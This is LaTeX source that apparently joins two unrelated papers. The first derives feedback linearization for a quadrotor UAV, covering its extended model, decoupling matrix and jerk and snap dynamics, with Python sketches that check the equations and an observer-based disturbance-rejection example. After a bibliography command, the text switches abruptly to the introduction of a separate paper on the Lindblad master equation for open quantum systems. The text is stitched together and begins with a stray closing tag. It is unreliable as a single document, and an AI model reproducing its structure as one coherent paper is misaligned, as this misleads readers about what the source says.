\end{acknowledgments}
|
\section{Introduction}
\label{sec:intro}
\IEEEPARstart{F}{eedback} Linearization (FL) technique allows transforming a command-affine non-linear model of the UAV quadrotor into an equivalent (fully or partly) linear one. Specifically, FL: (i) pursues the collection of all the model non-linearities at specific points, e.g. at the command level, and (ii) achieves an input-output linearization by means of a non-linear feedback, performing a perfect cancellation of non-linearities~\cite{khalil1996noninear}.
Nevertheless, model uncertainties make non-linear terms uncertain, and their use in the FL feedback may imply performance degradation and/or instability. Hence, this study proposes to use FL in combination with the Embedded Model Control (EMC) framework. In short, the designed FL-EMC approach lets us treat non-linearities as known and unknown disturbances to be estimated and then rejected, thus enhancing control robustness and performance. To this purpose, the study in~\cite{lotufoIEEE_TBC} focused on the so-called normal form representation of the non-linear model, where the non-linearities are collected at the command level, which perfectly fits the EMC internal model design rationale~\cite{lotufoIEEE_TBC}.
\section{Feedback Linearization}
\label{sec:fla}
The feedback linearization (FL) technique is an effective resource to linearize a non-linear model, by introducing a proper state transformation and a non-linear feedback~\cite{slotine1991applied}. Then, starting from the new linear model (i.e. the feedback-linearized one), a linear controller can be designed. In practice, within the FL, the model input-output linearization is obtained by differentiating each model output as many times as needed, until a control input component appears in the resulting equation.
Generally speaking, the feedback-linearized model is obtained by means of a system state transformation (diffeomorphism) and a non-linear feedback~\cite{slotine1991applied}. The state variables of the transformed model are the Lie derivatives of the system output $\mathbf{y}$. This implies that the choice of the output vector is extremely important to accomplish the input-output linearization.
Let us consider a command-affine square non-linear system, with state vector $\mathbf{x}\,{\in}\,R^{n}$, input $\mathbf{u}\,{\in}\,R^{m}$, and output $\mathbf{y}\,{\in}\,R^{m}$:
\begin{equation}
\label{eq:model_nl}
\begin{split}
\dot{\mathbf{x}}(t) &= \mathbf{f}(\mathbf{x}(t)) + G(\mathbf{x}(t))\mathbf{u}(t) , \: \mathbf{x}(0)=\mathbf{x}_0, \\
\mathbf{y}(t) &= \mathbf{h}(\mathbf{x}(t)),
\end{split}
\end{equation}
where $\mathbf{f}$ and $\mathbf{h}$ represent smooth vector fields~\cite{khalil1996noninear}, while $G\,{\in}\,R^{{n{\times}m}}$ is a matrix with smooth vector fields as columns. Denoting with $r_i$ the relative degree of the $i$-th output, we aim to obtain an equivalent non-linear model, where all non-linearities have been collected at the command level, i.e.:
\begin{equation}
\label{eq:model_fl}
\begin{bmatrix}
y_1^{(r_1)} \\ y_2^{(r_2)} \\ \dots \\ y_m^{(r_m)} \\
\end{bmatrix}(t) = E(\mathbf{x}(t))\mathbf{u}(t) + \mathbf{b}(\mathbf{x}(t)),
\end{equation}
where $y^{(n)}(t)$ denotes the time derivative of order $n$. Specifically,~\eqref{eq:model_fl} represents a cascade of integrators in parallel, where the output and its derivatives are the new state variables $\mathbf{z}$ defined as:
\begin{equation}
\label{eq:statetrans}
\begin{split}
\mathbf{z}\,{=}\,T(\mathbf{x})\,{=}\,[ & y_1 \:\: y_1^{(1)} \:\: \dots \:\: y_1^{(r_1-1)} \:\: \dots \\
& y_2 \:\: y_2^{(1)} \:\: \dots \:\: y_2^{(r_2-1)} \:\: \dots \\
& \dots \\
& y_m \:\: y_m^{(1)} \:\: \dots \:\: y_m^{(r_m-1)} ]^T,
\end{split}
\end{equation}
where $T(\mathbf{x})$ represents a diffeomorphism.
Whenever this state transformation is applicable and the decoupling matrix $E(\cdot)$ is invertible, it is possible to linearize the equivalent model~\eqref{eq:model_fl} via the non-linear feedback:
\begin{equation}
\label{eq:law_fl}
\begin{split}
\mathbf{u}(t) = E(\mathbf{x}(t))^{-1} \left( \mathbf{v}(t) - \mathbf{b}(\mathbf{x}(t)) \right).
\end{split}
\end{equation}
where $\mathbf{v}$ is a new equivalent command. Hence, by applying the feedback~\eqref{eq:law_fl} to the model~\eqref{eq:model_fl}, a parallel of $m$ decoupled input-output channels, represented by cascaded integrators, is obtained, viz.:
\begin{equation}
\label{eq:lin_mdl}
\begin{split}
\begin{bmatrix}
y_1^{(r_1)} \\ y_2^{(r_2)} \\ \dots \\ y_m^{(r_m)} \\
\end{bmatrix}(t) &= \mathbf{v}(t)
\end{split},
\end{equation}
where the new command $\mathbf{v}$ is used for the design of a linear controller.
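As a deliberately simple, hypothetical single-input illustration of the feedback~\eqref{eq:law_fl} and the resulting chain of integrators~\eqref{eq:lin_mdl}, consider $\ddot y = b(y,\dot y) + E(y)u$ with $b = \sin y + 0.5\dot y^2$ and $E = 1+y^2$ (invertible everywhere). The feedback $u = E^{-1}(v-b)$ with the linear law $v=-4y-4\dot y$ yields exactly $\ddot y = v$, a double integrator with both closed-loop poles at $-2$. A Python sketch:

```python
import numpy as np

def b(y, yd):  return np.sin(y) + 0.5 * yd**2      # model non-linearity
def E(y):      return 1.0 + y**2                   # always invertible

def closed_loop(z, k1=4.0, k2=4.0):
    """z = [y, ydot]; FL feedback u = E^{-1}(v - b), linear law v = -k1 y - k2 ydot."""
    y, yd = z
    v = -k1 * y - k2 * yd
    u = (v - b(y, yd)) / E(y)
    return np.array([yd, b(y, yd) + E(y) * u])     # = [yd, v] after cancellation

def rk4(f, z, dt):
    k1 = f(z); k2 = f(z + dt/2*k1); k3 = f(z + dt/2*k2); k4 = f(z + dt*k3)
    return z + dt/6*(k1 + 2*k2 + 2*k3 + k4)

dt, T = 1e-3, 5.0
z = np.array([1.0, 0.0])
ts = np.arange(0.0, T, dt)
traj = []
for t in ts:
    traj.append(z.copy())
    z = rk4(closed_loop, z, dt)
traj = np.array(traj)
# linear prediction with both poles at -2 and y(0)=1, ydot(0)=0
y_ref = (1 + 2*ts) * np.exp(-2*ts)
```

The simulated output coincides with the linear prediction, confirming that the non-linear feedback cancels $b$ and $E$ exactly.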
A ``full'' input-output linearization is achieved if the sum of the output relative degrees is equal to the order of the model~\eqref{eq:model_nl}~\cite{slotine1991applied}. When this condition is not verified, some dynamics are hidden by the state transformation. This so-called ``internal'' dynamics could be unstable~\cite{slotine1991applied}. In this case the feedback linearization process fails.
Finally, when $E(\cdot)$ is not invertible in $R^{n}$, it is possible to adopt a new command vector by considering the derivative of some of the command components. This solution, called dynamic extension~\cite{slotine1991applied}, enables the applicability of the feedback linearization by making the $E(\cdot)$ invertible, yet at a cost: the introduction of a dynamics in the command.
Furthermore, let us remark that the non-singularity condition of $E(\cdot)$ is not necessarily verified in the complete state space. As a matter of fact, in some applications, these singularities can be avoided by applying proper constraints to the state trajectories.
\section{The Quadrotor UAV Case-study}
\label{sec:quad_fla}
As depicted above, the input-output linearization is achieved by differentiating each output until a control input appears. Hence, the successful application of the feedback linearization strongly depends on the chosen output vector.
As a matter of fact, the adopted Quadrotor UAV dynamics, which encompasses four commands and three outputs~\cite{lotufoIEEE_TBC}, is characterized by a non-square decoupling matrix $E(\cdot)\,{\in}\,\mathcal{R}^{3,4}$~\cite{mistler2001_FL}. Therefore, in~\cite{lotufoIEEE_TBC}, the quadrotor heading angle $\psi$ was selected as an additional output to be controlled, so as to make the FL applicable to the Quadrotor UAV model~\cite{lotufoIEEE_TBC}.
However, in the quadrotor UAV case-study treated in~\cite{lotufoIEEE_TBC}, the problem is not solvable by means of a static feedback~\cite{mistler2001_FL}. Conversely, a full linearization may be only achieved by introducing additional states to the standard quadrotor model, thus obtaining the so-called extended model~\cite{mistler2001_FL}. In fact, in order to obtain a non-singular decoupling matrix $E(\cdot)$, the second derivative of the first command component, $u_1$ in \figurename~\ref{fig:extended}, with respect to time was also needed.
As a result, the introduction of two more states, i.e. $\zeta\,{=}\,u_1$ and its derivative $\chi\,{=}\,\dot{u}_1$, leads to the definition of the Quadrotor UAV extended model, whose state vector is $\mathbf{x}\,{=}\,\left[ \mathbf{r}^T \:\: \mathbf{v}^T \:\: \boldsymbol{\theta}^T \:\: \boldsymbol{\omega}_b^T \:\: \zeta \:\: \chi \right]^T$, where $\mathbf{r}$ and $\mathbf{v}$ are respectively the inertial position and velocity of the CoM, $\boldsymbol{\theta}=[\phi \:\: \theta \:\: \psi]^T$ are the attitude angles, and $\boldsymbol{\omega}_b$ is the body angular rate vector.
Hence, the model, sketched in \figurename~\ref{fig:extended}, holds~\cite{lotufoIEEE_TBC}:
\begin{equation}
\label{eq:extended_quad}
\begin{split}
\boldsymbol{\dot{\theta}}(t) &= A(\boldsymbol{\theta}(t)) \boldsymbol{\omega}_b(t), \quad \boldsymbol{\theta}(0)= \boldsymbol{\theta}_0, \\
A(\boldsymbol{\theta}) &=
\frac{1}{c_{\theta}}
\begin{bmatrix}
c_{\psi} & -s_{\psi} & 0 \\
c_{\theta}s_{\psi} & c_{\theta}c_{\psi} & 0 \\
-s_{\theta}c_{\psi} & s_{\theta}s_{\psi} & c_{\theta}
\end{bmatrix}, \\
\dot{\boldsymbol{\omega}}_b(t) &= \mathbf{u}(t) - J^{-1}(\boldsymbol{\omega}_b(t) \times J\boldsymbol{\omega}_b(t)) + \mathbf{d}(t), \\
\boldsymbol{\omega}_b(0) &= \boldsymbol{\omega}_{b0}, \\
\dot{\mathbf{r}}(t) &= \mathbf{v}(t), \quad \mathbf{r}(0) = \mathbf{r}_0, \\
\dot{\mathbf{v}}(t) &= R_{b}^i(\boldsymbol{\theta})\begin{bmatrix} 0 & 0 & \zeta(t) \end{bmatrix}^T
- \mathbf{g} + \mathbf{a}_d(t), \\
\mathbf{v}(0) &= \mathbf{v}_0, \\
\dot{\zeta}(t) &= \chi(t), \\
\dot{\chi}(t) &= \ddot{u}_1(t), \\
\mathbf{y}(t) &= \begin{bmatrix} \mathbf{r} \\ \psi \end{bmatrix}(t), \quad
\overline{\mathbf{u}} = \begin{bmatrix} \ddot{u}_1 \\ \mathbf{u} \end{bmatrix}(t).
\end{split}
\end{equation}
In~\eqref{eq:extended_quad}, $\mathbf{u}$ is the command torque along the three body axes, while $J$ is the quadrotor inertia matrix. In addition, $R^i_{b}(\boldsymbol{\theta})$ describes the body-to-inertial attitude, $\mathbf{g}\,{=}\,\left[ 0 \:\: 0 \:\: 9.81 \right]^T$ is the gravity vector, while $\mathbf{d}$ and $\mathbf{a}_d$ represent all the external disturbances (e.g. wind, rotor aerodynamics, mechanical vibration, actuator noise) affecting the model dynamics. Finally, $\overline{\mathbf{u}}$ and $\mathbf{y}$ are the new command vector and the extended model output, respectively.
\begin{figure}[!t]
\centering
\includegraphics[width=2.5in]{QuadrotorModelExtended_V2}
\caption{Quadrotor UAV extended Model.}
\label{fig:extended}
\end{figure}
The extended model~\eqref{eq:extended_quad} is the foremost building block of the feedback linearization process, performed to obtain the feedback-linearized model leveraged in~\cite{lotufoIEEE_TBC} to design the internal model for the EMC state and disturbance predictor. To this aim, starting from the overall model in~\eqref{eq:extended_quad}, we will derive the feedback-linearized heading and CoM dynamics, through the procedure outlined in Sec. II.
\subsection{The Quadrotor UAV Dynamics}
\label{subsec:quad_fla_head}
Considering the quadrotor attitude kinematics in~\eqref{eq:extended_quad}, let us start from the heading dynamics. The first order time-derivative of the heading angle holds:
\begin{equation}
\label{eq:psi_1}
\begin{split}
\psi^{(1)}(t) &= \eta(t) = \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t), \\
\mathbf{b}_{\psi}(\boldsymbol{\theta}(t)) &= [ -t_\theta c_\psi \quad t_\theta s_\psi \quad 1].
\end{split}
\end{equation}
A further derivative is needed in order to relate the output with the command, viz.:
\begin{equation}
\label{eq:fl_heading}
\begin{split}
\psi^{(2)}(t) &= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))(\mathbf{u}(t) - \mathbf{h}_g(t) + \mathbf{d}(t)) + \dot{\mathbf{b}}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t)= \\
&= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\mathbf{u}(t) + h_\psi(\mathbf{x}(t)) + d_\psi(t),
\end{split}
\end{equation}
where we defined $h_\psi$ and $d_\psi$ as:
\begin{equation}
\label{eq:fl_heading2}
\begin{split}
h_\psi(\mathbf{x}(t)) &= \dot{\mathbf{b}}_{\psi}(\boldsymbol{\theta}(t))\boldsymbol{\omega}_b(t) - \mathbf{b}_{\psi} (\boldsymbol{\theta}(t))\mathbf{h}_g(t), \\
d_\psi(t) &= \mathbf{b}_{\psi}(\boldsymbol{\theta}(t))\mathbf{d}(t).
\end{split}
\end{equation}
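A quick numerical cross-check of Eqs.~\eqref{eq:psi_1}--\eqref{eq:fl_heading2} (illustrative, with arbitrary state values): the row vector $\mathbf{b}_\psi$ is exactly the third row of $A(\boldsymbol{\theta})$ in~\eqref{eq:extended_quad}, and along a trajectory with constant body rates (obtained by setting $\mathbf{u} = \mathbf{h}_g$ and $\mathbf{d}=0$, so that $\dot{\boldsymbol{\omega}}_b=0$) Eq.~\eqref{eq:fl_heading} reduces to $\ddot\psi = \dot{\mathbf{b}}_\psi\boldsymbol{\omega}_b$, which can be compared with a finite-difference second derivative of $\psi$:

```python
import numpy as np

def A(th):                      # attitude kinematics matrix of Eq. (6)
    phi, theta, psi = th
    c, s, t = np.cos, np.sin, np.tan
    return np.array([[ c(psi)/c(theta), -s(psi)/c(theta), 0.0],
                     [ s(psi),           c(psi),          0.0],
                     [-t(theta)*c(psi),  t(theta)*s(psi), 1.0]])

def b_psi(th):
    _, theta, psi = th
    return np.array([-np.tan(theta)*np.cos(psi), np.tan(theta)*np.sin(psi), 1.0])

omega = np.array([0.1, -0.2, 0.15])   # constant body rates (u = h_g, d = 0)
th0   = np.array([0.2, 0.3, 0.5])     # arbitrary attitude, tilt below pi/2

f = lambda th: A(th) @ omega          # theta_dot = A(theta) omega_b
def rk4(th, h):
    k1 = f(th); k2 = f(th + h/2*k1); k3 = f(th + h/2*k2); k4 = f(th + h*k3)
    return th + h/6*(k1 + 2*k2 + 2*k3 + k4)

# analytic psi_ddot = bdot_psi . omega_b  (Eq. (8) with u = h_g, d = 0)
phid, thd, psid = f(th0)
_, th_, ps_ = th0
sec2 = 1.0 / np.cos(th_)**2
bdot = np.array([-thd*sec2*np.cos(ps_) + np.tan(th_)*np.sin(ps_)*psid,
                  thd*sec2*np.sin(ps_) + np.tan(th_)*np.cos(ps_)*psid, 0.0])
psi_dd = bdot @ omega

# finite-difference second derivative of psi along the integrated trajectory
h = 1e-3
psi_dd_num = (rk4(th0, h)[2] - 2*th0[2] + rk4(th0, -h)[2]) / h**2
```

Both evaluations of $\ddot\psi$ agree to numerical precision.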
Concerning the CoM dynamics, two further derivatives beyond the CoM acceleration are needed to relate the output to the command (cf. Sec.~\ref{sec:fla}).
Specifically, the CoM position third derivative, i.e. the jerk $\mathbf{s}$, holds:
\begin{multline}
\label{eq:jerk}
\mathbf{r}^{(3)}(t) = \mathbf{s}(t) = \\
= R_b^i(\boldsymbol{\theta}(t))\left( \begin{bmatrix}
0 \\ 0 \\ \chi(t)
\end{bmatrix} +
S(\boldsymbol{\omega}_b(t))\begin{bmatrix} 0 \\ 0 \\ \zeta(t) \end{bmatrix} \right) + \dot{\mathbf{a}}_d(t),
\end{multline}
being $S(\boldsymbol{\omega}_b)$:
\begin{equation}
\label{eq:jerk2}
\begin{split}
S(\boldsymbol{\omega}_b) = \begin{bmatrix}
0 & -\omega_z & \omega_y \\ \omega_z & 0 & -\omega_x \\ -\omega_y & \omega_x & 0
\end{bmatrix}
\end{split}.
\end{equation}
In~\eqref{eq:jerk}, the first term on the right-hand side represents the contribution of the vertical jerk command, whereas the second term is the jerk component due to the quadrotor angular rates.
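Note that $S(\boldsymbol{\omega}_b)$ is simply the cross-product (skew-symmetric) matrix, $S(\boldsymbol{\omega})\mathbf{v}=\boldsymbol{\omega}\times\mathbf{v}$, so the second term of~\eqref{eq:jerk} is the rate-induced tilt of the thrust direction. A small numeric check, with illustrative values:

```python
import numpy as np

def S(w):
    """Skew-symmetric cross-product matrix of Eq. (11)."""
    wx, wy, wz = w
    return np.array([[0.0, -wz,  wy],
                     [ wz, 0.0, -wx],
                     [-wy,  wx, 0.0]])

w  = np.array([0.3, -1.2, 0.7])    # arbitrary body rates
v  = np.array([1.0, 2.0, -0.5])
e3 = np.array([0.0, 0.0, 1.0])
# S(w) v = w x v, and S(w) e3 = (wy, -wx, 0): the angular-rate jerk term
```

The second identity explains why only the $x$ and $y$ body rates enter the rate-induced jerk component of~\eqref{eq:jerk}.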
Moreover, a further derivative of~\eqref{eq:jerk} is necessary in order to have a full-rank decoupling matrix $E(\cdot)$. Hence, it holds:
\begin{multline}
\label{eq:r4_1}
\mathbf{r}^{(4)}(t) = R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\dot{\omega}_y \zeta \\ -\dot{\omega}_x \zeta \\ \ddot{u}_1 \end{bmatrix}(t) + \\
+ 2\chi(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_y \\ -\omega_x \\ 0 \end{bmatrix}(t) + \\
+ \zeta(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_x\omega_z \\ \omega_y\omega_z \\ -(\omega_x^2 + \omega_y^2)
\end{bmatrix}(t) + \ddot{\mathbf{a}}_d(t).
\end{multline}
As a result, by introducing the quadrotor attitude dynamics from~\eqref{eq:extended_quad} in~\eqref{eq:r4_1}, we obtain:
\begin{equation}
\label{eq:fl_com}
\begin{split}
\mathbf{r}^{(4)}(t) &= R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\zeta u_3 \\ - \zeta u_2 \\ \ddot{u}_1
\end{bmatrix}(t) + \mathbf{h}_r(\mathbf{x}(t)) + \mathbf{d}_r(\mathbf{x}(t),t),
\end{split}
\end{equation}
where $\mathbf{h}_r$ and $\mathbf{d}_r$ are the known and the unknown disturbance terms, respectively. Specifically, $\mathbf{h}_r(\mathbf{x}(t))$ is defined as:
\begin{multline}
\label{eq:fl_com2}
\mathbf{h}_r(t) = \zeta(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_x\omega_z -h_{gy} \\ \omega_y\omega_z + h_{gx} \\ - (\omega_x^2 + \omega_y^2)
\end{bmatrix}(t) + \\
+ 2\chi(t)R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\omega_y \\ -\omega_x \\ 0 \end{bmatrix}(t),
\end{multline}
whereas $\mathbf{d}_r(\mathbf{x}(t))$ holds:
\begin{equation}
\label{eq:fl_com_d}
\begin{split}
\mathbf{d}_r(\mathbf{x}(t)) = R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
\zeta d_{ry} \\ -\zeta d_{rx} \\ 0
\end{bmatrix}(t) + \ddot{\mathbf{a}}_d(t).
\end{split}
\end{equation}
From~\eqref{eq:fl_com_d}, it is interesting to notice how only tilt disturbances ($d_{rx}$, $d_{ry}$) act on the CoM dynamics, and how they are amplified by the body vertical acceleration $\zeta\,{=}\,u_1$, which is close to the gravity value for non-aggressive manoeuvres~\cite{lotufo2016}.
\subsection{The Quadrotor UAV Case-study: Complete Model}
\label{subsec:quad_fla_head}
As a further step, putting together the heading dynamics~\eqref{eq:fl_heading} and the CoM dynamics~\eqref{eq:fl_com}, the whole input-output relation is found:
\begin{multline}
\label{eq:fl_final}
\begin{bmatrix} \mathbf{r}^{(4)} \\ \psi^{(2)} \end{bmatrix}(t) =
E(\boldsymbol{\theta}(t),\zeta(t))\overline{\mathbf{u}}(t) + \begin{bmatrix} \mathbf{h}_r \\ h_\psi \end{bmatrix}(t) +
\begin{bmatrix} \mathbf{d}_r \\ d_\psi \end{bmatrix}(t),
\end{multline}
where
\begin{equation}
\label{eq:fl_final2}
\begin{split}
E(\boldsymbol{\theta}(t),\zeta(t)) &= \left[ \begin{array}{c;{2pt/2pt}c}
B_r(\boldsymbol{\theta}(t),\zeta(t)) & \begin{array}{c}
0 \\ 0 \\ 0
\end{array} \\ \hdashline[2pt/2pt]
\begin{array}{ccc}
0 & -t_\theta c_\psi & \quad t_\theta s_\psi
\end{array} & 1
\end{array} \right] \\
B_r(\boldsymbol{\theta}(t),\zeta(t)) &= R_b^i(\boldsymbol{\theta}(t))\begin{bmatrix}
0 & 0 & \zeta(t) \\ 0 & -\zeta(t) & 0 \\ 1 & 0 & 0 \end{bmatrix}.
\end{split}
\end{equation}
As shown in~\eqref{eq:statetrans}, the state vector of the new equivalent model~\eqref{eq:fl_final} is defined by $\mathbf{z}\,{=}\,T(\mathbf{x})\,{=}\,[\mathbf{r} \:\: \mathbf{v} \:\: \mathbf{a} \:\: \mathbf{s} \:\: \psi \:\: \eta]^T$.
More interestingly, the total relative degree of the model in~\eqref{eq:fl_final} is equal to the order of the extended model in~\eqref{eq:extended_quad}, namely $r_1\,{+}\,r_2\,{+}\,r_3\,{+}\,r_4\,{=}\,n\,{=}\,14$: this implies that no internal dynamics exists, and a full input-output linearization has been achieved.
Furthermore, the decoupling matrix $E(\mathbf{x}(t))$ is non-singular in $D\,{=}\,\lbrace \mathbf{x}(t) \subset R^n : \zeta(t) \neq 0, |\phi(t)|<\pi/2, |\theta(t)|<\pi/2 \rbrace $. This implies that aggressive manoeuvres may be performed, although with tilt angles lower than $\pi/2$ (acrobatic manoeuvres, such as 360-loops, were not in the scope of~\cite{lotufoIEEE_TBC}). On the other side, since the actuators effect is lower-bounded by a minimum saturation thrust, the total vertical acceleration is always positive. For these practical reasons, the state trajectories were constrained to the domain $D$, where the invertibility of the decoupling matrix is guaranteed.
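These properties can be verified numerically. Assuming a standard Z-Y-X (yaw-pitch-roll) attitude parametrization for $R_b^i$ (the text does not fix the Euler sequence, and the result below does not depend on it), one finds $\det E(\cdot)=\zeta^2$ for any attitude, so the decoupling matrix of~\eqref{eq:fl_final2} loses rank exactly when the vertical acceleration $\zeta$ vanishes:

```python
import numpy as np

def R_bi(phi, th, psi):
    """Body-to-inertial rotation, assumed Z-Y-X (yaw-pitch-roll) sequence."""
    c, s = np.cos, np.sin
    Rz = np.array([[c(psi), -s(psi), 0], [s(psi), c(psi), 0], [0, 0, 1]])
    Ry = np.array([[c(th), 0, s(th)], [0, 1, 0], [-s(th), 0, c(th)]])
    Rx = np.array([[1, 0, 0], [0, c(phi), -s(phi)], [0, s(phi), c(phi)]])
    return Rz @ Ry @ Rx

def E_mat(phi, th, psi, zeta):
    """Decoupling matrix of Eq. (19)."""
    Br = R_bi(phi, th, psi) @ np.array([[0, 0, zeta],
                                        [0, -zeta, 0],
                                        [1, 0, 0]], float)
    E = np.zeros((4, 4))
    E[:3, :3] = Br
    E[3, :] = [0, -np.tan(th)*np.cos(psi), np.tan(th)*np.sin(psi), 1.0]
    return E

phi, th, psi, zeta = 0.4, -0.3, 1.1, 9.5   # arbitrary state inside D
```

Since $\det R_b^i=1$ and the block below the zero column is irrelevant to the determinant, $\det E=\zeta^2$ holds for any tilt in $D$; only $\zeta\to0$ makes the matrix singular, while tilt angles approaching $\pi/2$ make its last-row entries unbounded.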
To conclude, \figurename~\ref{fig:model} sketches the final model~\eqref{eq:fl_final} (cf. also~\cite{lotufoIEEE_TBC}), where the non-linear couplings with the commands $u_2$ and $u_3$ in $\mathbf{b}_\psi$ were collected in $h_\psi^*(\mathbf{x}(t),u_2(t),u_3(t))\,{=}\,-t_\theta c_\psi u_2(t)\,{+}\,t_\theta s_\psi u_3(t)$. On the other hand, $\mathbf{h}_r$ and $h_\psi$ collect all the non-linearities, collocated at command level. Finally, consistently with the EMC design framework, the terms $\mathbf{d}_r$ and $d_\psi$ represent the non-explicitly modelled effects and the external disturbances.
\begin{figure}[!t]
\centering
\includegraphics[width=2.5in]{FBresult_v7}
\caption{Global scheme of the quadrotor UAV input-output linearized model, as result of the FL technique (Courtesy: \cite{lotufoIEEE_TBC}).}
\label{fig:model}
\end{figure}
As per \figurename~\ref{fig:model}, for the purpose of the linear control design, the model~\eqref{eq:fl_final} can be rewritten as:
\begin{subequations}
\label{eq:fl}
\begin{align}
\dot{\mathbf{r}}(t) &= \mathbf{v}(t), \quad \mathbf{r}(0) = \mathbf{r}_0, \label{eq:flA1} \\
\dot{\mathbf{v}}(t) &= \mathbf{a}(t), \quad \mathbf{v}(0) = \mathbf{v}_0, \label{eq:flA2} \\
\dot{\mathbf{a}}(t) &= \mathbf{s}(t), \quad \mathbf{a}(0) = \mathbf{a}_0, \label{eq:flA3} \\
\dot{\mathbf{s}}(t) &= \mathbf{u}_r(t) + \mathbf{h}_r(\mathbf{x}(t)) + \mathbf{d}_r(t), \quad \mathbf{s}(0) = \mathbf{s}_0, \label{eq:flA4} \\
\dot{\psi}(t) &= \eta(t), \quad \psi(0) = \psi_0, \label{eq:flB1} \\
\dot{\eta}(t) &= u_4(t) + h_\psi(\mathbf{x}(t)) + h_\psi^*(\cdot) + d_\psi(t), \quad \eta(0) = \eta_0, \label{eq:flB2}
\end{align}
\end{subequations}
where $\mathbf{u}_r$ is a transformed command, defined as:
\begin{equation}
\label{eq:new_ur}
\begin{split}
\mathbf{u}_r(t) &= \mathbf{B}_r(\mathbf{x}(t)) \begin{bmatrix} \ddot{u}_1 & u_2 & u_3 \end{bmatrix}^T(t).
\end{split}
\end{equation}
As a result,~\cref{eq:flA1,eq:flA2,eq:flA3,eq:flA4,eq:flB1,eq:flB2} represent the quadrotor UAV model where all the non-linearities have been collocated at the command level and can therefore be cancelled by a non-linear feedback of the form expressed in~\eqref{eq:law_fl}. Nevertheless, this approach relies on perfect knowledge of the model non-linearities ($\mathbf{h}_r$, $h_\psi$), which may considerably limit the controller performance as well as its practical applicability.
To this aim, the novel approach proposed in~\cite{lotufoIEEE_TBC} (namely, the FL-EMC design) considers the model~\eqref{eq:fl} from a different point of view. More precisely, the non-linear components are treated as generic unknown disturbances which are estimated in real time by a proper extended state observer. Thus, by implementing a direct disturbance rejection jointly with a linear control law, it is possible to completely neglect the model non-linearities and, at the same time, to enhance the controller robustness against model uncertainties.
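To fix ideas, the following is a schematic numerical sketch of this disturbance-rejection principle on a simplified single-axis double integrator ($\dot{x}_1=x_2$, $\dot{x}_2=u+f(x)$, with $f$ an unknown non-linearity). The non-linearity, the observer bandwidth, and the feedback gains are purely illustrative and are not taken from~\cite{lotufoIEEE_TBC}; the point is only that a linear extended state observer (ESO) estimates $f$ as an extra state, which is then cancelled from the command.

```python
import numpy as np

# Plant: x1' = x2, x2' = u + f(x), with f an "unknown" non-linearity.
# A linear ESO estimates [x1, x2, f] as z = [z1, z2, z3]; the command
# cancels the estimated disturbance: u = u0 - z3.

dt, T = 1e-3, 5.0

def f(x1, x2):
    return 0.5 * np.sin(x1) + 0.2 * x2**2      # illustrative non-linearity

w = 10.0                                       # observer bandwidth (illustrative)
l1, l2, l3 = 3 * w, 3 * w**2, w**3             # ESO gains: triple pole at -w
k1, k2 = 4.0, 4.0                              # nominal PD gains

x = np.zeros(2)                                # true plant state [x1, x2]
z = np.zeros(3)                                # observer state [x1_hat, x2_hat, f_hat]
ref = 1.0                                      # constant position reference

for _ in range(int(T / dt)):
    u0 = k1 * (ref - z[0]) - k2 * z[1]         # linear law on the estimates
    u = u0 - z[2]                              # direct disturbance rejection
    e = x[0] - z[0]                            # output estimation error
    x_dot = np.array([x[1], u + f(x[0], x[1])])
    z_dot = np.array([z[1] + l1 * e, z[2] + u + l2 * e, l3 * e])
    x += dt * x_dot                            # explicit Euler integration
    z += dt * z_dot

tracking_error = abs(x[0] - ref)               # small despite unknown f
estimation_error = abs(z[2] - f(x[0], x[1]))   # ESO has learned f
```

Despite the controller having no model of $f$, the observer converges to it and the tracking error becomes negligible, which is the essence of treating non-linearities as estimated disturbances.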
\ifCLASSOPTIONcaptionsoff
\newpage
\fi
\bibliographystyle{IEEEtran}
\section{Introduction}
Open quantum system techniques are vital for many studies in quantum mechanics \cite{gardiner_00,breuer_02,rivas_12}. This happens because closed quantum systems are just an idealisation of real systems\footnote{The same happens with closed classical systems.}, as in Nature nothing can be isolated. In practical problems, the interaction of the system of interest with the environment cannot be avoided, and we require an approach in which the environment can be effectively removed from the equations of motion.
The general problem addressed by Open Quantum Theory is sketched in Figure \ref{fig:fig0}. In the most general picture, we have a total system that constitutes a closed quantum system by itself. We are mostly interested in a subsystem of the total one (so we call it just ``system'' instead of ``total system''). The whole system is therefore divided into our system of interest and an environment. The goal of Open Quantum Theory is to infer the equations of motion of the reduced system from the equations of motion of the total system. For practical purposes, the reduced equations of motion should be easier to solve than the full dynamics of the system. Because of this requirement, several approximations are usually made in the derivation of the reduced dynamics.
\begin{figure}[h!]
\begin{center}
\includegraphics[scale=0.2]{figure0}
\end{center}
\caption{A total system divided into the system of interest, ``System'', and the environment. }
\label{fig:fig0}
\end{figure}
One particularly interesting case of study is the dynamics of a system connected to several baths modelled by a Markovian interaction. In this case, the most general quantum dynamics is generated by the Lindblad equation (also called the Gorini-Kossakowski-Sudarshan-Lindblad equation) \cite{lindblad:cmp76,gorini:jmp76}. It is difficult to overemphasize the importance of this Master Equation. It plays an important role in fields such as quantum optics \cite{gardiner_00,manzano:sr16}, condensed matter \cite{prosen:prl11,manzano:pre12,manzano:njp16,olmos:prl12}, atomic physics \cite{metz:prl06,jones:pra18}, quantum information \cite{lidar:prl98,kraus:08}, decoherence \cite{brun:pra00,schlosshauer_07}, and quantum biology \cite{plenio:njp08,mohseni:jcp08, manzano:po13}.
The purpose of this paper is to provide basic knowledge about the Lindblad Master Equation. In Section \ref{sec:math}, the mathematical requirements are introduced, while Section \ref{sec:qm} contains a brief review of the quantum mechanical concepts required to understand the paper. Section \ref{sec:fl} includes a description of a mathematical framework, the Fock-Liouville space, that is especially useful to work on this problem. In Section \ref{cpt}, we define the concept of CPT-maps, derive the Lindblad Master Equation from two different approaches, and discuss several properties of the equation. Finally, Section \ref{sec:resolution} is devoted to the resolution of the master equation using different methods. To deepen the reader's understanding of the techniques for solving the Lindblad equation, an example consisting of a two-level system with decay is analysed, illustrating the content of every section. The problems proposed are solved by the use of Mathematica notebooks that can be found at \cite{notebook}.
